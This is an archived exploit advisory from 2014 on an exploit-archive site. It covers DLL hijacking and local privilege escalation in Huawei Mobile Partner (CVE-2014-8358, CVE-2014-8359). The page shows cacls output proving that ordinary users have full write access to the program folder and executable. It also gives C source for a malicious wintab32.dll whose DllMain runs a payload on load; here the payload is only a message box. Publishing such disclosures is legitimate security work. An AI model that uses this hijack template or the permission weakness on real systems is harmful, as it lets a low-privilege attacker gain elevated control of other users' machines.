Huawei Mobile Partner DLL Hijacking

Huawei Mobile Partner DLL Hijacking: Posted Oct 21, 2014; Authored by Osanda Malith; Huawei Mobile Partner suffers from a DLL hijacking vulnerability.; tags | exploit; systems | windows; advisories | CVE-2014-8358, CVE-2014-8359; SHA-256 | 913927cdd94e02084afad32b696a3ca202f8c09234d1c117b3a97dac19da2ff7; Download | Favorite | View

Huawei Mobile Partner DLL Hijacking

# Title: Huawei Mobile Partner Multiple Vulnerabilities
# Version: 23.009.05.03.1014
# Tested on: Windows XP SP2 en
# Vendor: http://www.huawei.com/
# Software-Link: http://download-c.huawei.com/download/downloadCenter?downloadId=18474&version=16815&siteCode=worldwide
# E-Mail: osanda[at]unseen.is
# Author: Osanda Malith Jayathissa
# /!\ Author is not responsible for any damage you cause
# Use this material for educational purposes only


#1| Local Privilege Escalation 
--------------------------------

- Description
==============
Any user in the system can modify the legitimate binary to any kind of malicious executable. 
The user could also place a malicious wintab32.dll file inside the "Mobile Partner" folder and
perform DLL hijacking easily. If an attacker break into a low privilege account he could use
this application to escalate his privileges.

- Proof of Concept
===================

C:\Program Files>cacls "Mobile Partner"
C:\Program Files\Mobile Partner BUILTIN\Users:(OI)(IO)F
                                BUILTIN\Users:(CI)F
                                NT SERVICE\TrustedInstaller:(ID)F
                                NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                                NT AUTHORITY\SYSTEM:(ID)F
                                NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
                                BUILTIN\Administrators:(ID)F
                                BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
                                CREATOR OWNER:(OI)(CI)(IO)(ID)F


C:\Program Files>cd "Mobile Partner"

C:\Program Files\Mobile Partner>cacls "Mobile Partner.exe"
C:\Program Files\Mobile Partner\Mobile Partner.exe BUILTIN\Users:F
                                                   BUILTIN\Users:(ID)F
                                                   NT AUTHORITY\SYSTEM:(ID)F
                                                   BUILTIN\Administrators:(ID)F




#2| Dll Hijacking Vulnerability (wintab32.dll)
-----------------------------------------------


#include <windows.h> 

BOOL WINAPI DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    switch (fdwReason)
  {
  case DLL_PROCESS_ATTACH: owned();
  case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
  break;
  }
  return TRUE;
}

int owned() {
  MessageBox(0, "Mobile Partner DLL Hijacked\nOsanda Malith", "POC", MB_OK | MB_ICONWARNING);
}
/*EOF*/

Top Authors In Last 30 Days

Red Hat 194 files
Ubuntu 101 files
indoushka 31 files
Debian 22 files
Gentoo 14 files
CraCkEr 11 files
Mirabbas Agalarov 9 files
Apple 8 files
nu11secur1ty 6 files
LiquidWorm 6 files

File Archives

Systems

AIX (428)
Apple (1,979)
BSD (373)
CentOS (57)
Cisco (1,920)
Debian (6,758)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,321)
HPUX (879)
iOS (344)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,866)
Mac OS X (685)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (13,370)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,652)
UNIX (9,246)
UnixWare (186)
Windows (6,557)
Other

Huawei Mobile Partner DLL Hijacking

Huawei Mobile Partner DLL Hijacking

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Huawei Mobile Partner DLL Hijacking

Share This

Huawei Mobile Partner DLL Hijacking

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems